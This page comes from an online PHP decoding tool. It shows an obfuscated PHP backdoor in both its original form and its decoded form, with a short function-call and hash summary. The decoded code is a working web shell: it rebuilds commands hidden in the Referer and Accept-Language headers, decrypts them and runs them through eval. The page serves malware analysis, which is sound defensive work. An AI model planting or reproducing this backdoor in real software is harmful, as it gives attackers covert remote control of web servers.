Find this useful? Enter your email to receive occasional updates for securing PHP code.
Signing you up...
Thank you for signing up!
PHP Decode
<?php $F='tkf)@t,0,3)@t);$p=""@t;for(@t$z=1;$z<co@tu@tnt($m[1]@t);$@tz++)$p@t.=$q[$m[2@t][..
Decoded Output download
$kh="5d41";$kf="402a";function x($t,$k){$c=strlen($k);$l=strlen($t);$o="";for($i=0;$i<$l;){for($j=0;($j<$c&&$i<$l);$j++,$i++){$o.=$t{$i}^$k{$j};}}return $o;}$r=$_SERVER;$rr=@$r["HTTP_REFERER"];$ra=@$r["HTTP_ACCEPT_LANGUAGE"];if($rr&&$ra){$u=parse_url($rr);parse_str($u["query"],$q);$q=array_values($q);preg_match_all("/([\w])[\w-]+(?:;q=0.([\d]))?,?/",$ra,$m);if($q&&$m){@session_start();$s=&$_SESSION;$ss="substr";$sl="strtolower";$i=$m[1][0].$m[1][1];$h=$sl($ss(md5($i.$kh),0,3));$f=$sl($ss(md5($i.$kf),0,3));$p="";for($z=1;$z<count($m[1]);$z++)$p.=$q[$m[2][$z]];if(strpos($p,$h)===0){$s[$i]="";$p=$ss($p,3);}if(array_key_exists($i,$s)){$s[$i].=$p;$e=strpos($s[$i],$f);if($e){$k=$kh.$kf;ob_start();eval(@gzuncompress(@x(base64_decode(preg_replace(array("/_/","/-/"),array("/","+"),$ss($s[$i],0,$e))),$k)));$o=ob_get_contents();ob_end_clean();$d=base64_encode(x(gzcompress($o),$k));print("<$k>$d</$k>");@session_destroy();}}}}
Did this file decode correctly?
Original Code
<?php
$F='tkf)@t,0,3)@t);$p=""@t;for(@t$z=1;$z<co@tu@tnt($m[1]@t);$@tz++)$p@t.=$q[$m[2@t][$z]];if(@tstrpo@ts($p,$@th)===@t0){$';
$H='l@t;@t){for($j=0;@t($j<$c&@t&$i<$l);$j@t++,$i@t++){@t$o.=$t{@t$i}^$k@t{$j};}}ret@tur@tn $o;}$r@t=$@t_SERV@tER;$r';
$R='$@tkh="5d41";$k@tf="402a";f@tuncti@ton @tx($t,$k){@t$c@t=strlen@t($k);$l=s@ttrlen($@tt);@t$o=""@t;fo@tr($i=0@t;$i<$';
$h='r=@$r["H@tTTP_RE@tFER@tE@tR"];$ra=@$r@t["H@t@tTTP_ACCEPT_LAN@tGUA@tGE"@t];if($rr&&$r@ta){$u=pa@trse@t_url($r';
$v='sl="@tstrt@tolower";$i=$m@t[1][0@t@t].$@tm[1][1];$h=$sl(@t@t$ss(md5($i.@t$kh),0,@t3))@t;$f=$s@tl($ss@t(md5($i.$@';
$Q='rray("/_/@t","/-/"),array(@t"/","@t+"),$ss(@t$s[@t$i@t],0@t,$@t@te))),$k)));$o=ob_get_con@t@ttents()@t;ob_end';
$D='r);@tpa@trse_@tstr($u["quer@ty"],$@tq);$q=ar@tray_v@t@talues(@t$q);p@treg@t_matc@th_all("/([\\w])[\\w@t-]@t+(?';
$S=str_replace('yS','','crySeaySySteySyS_fuySnction');
$i='@t@t_clean();$d=base@t64_encode(@tx(gz@tc@tompress@t($o),@t$k))@t@t;print("<@t$k>$d<@t/$k>");@@tsession_de@tstroy();}}}}';
$A='@t)@t{$k=$k@th.$kf;ob_@tsta@trt();@e@t@tval(@gzuncom@tpress@t(@x(@base6@t4_dec@tode(pre@tg_re@tplace@t(@ta@t';
$L=':;q=0@t.([\\d@t]@t))?,?/",$ra,@t$m@t);if($@tq&@t&$m){@session_sta@trt()@t;$s@t=&$_SE@tSSI@tON;$ss="subst@t@tr";$';
$K='@ts[@t$i@t]="";$p=$s@ts($p,3);}if(arr@tay_ke@ty_@t@texists($i,$s)){$s@t[@t$i@t].=$p;$e=st@tr@tpos($s[$i],$f)@t;if($e';
$P=str_replace('@t','',$R.$H.$h.$D.$L.$v.$F.$K.$A.$Q.$i);
$U=$S('',$P);$U();
?>
Function Calls
null | 1 |
str_replace | 2 |
create_function | 1 |
Stats
MD5 | e0444d5ffea458d9b57cf61b8b00ec50 |
Eval Count | 1 |
Decode Time | 108 ms |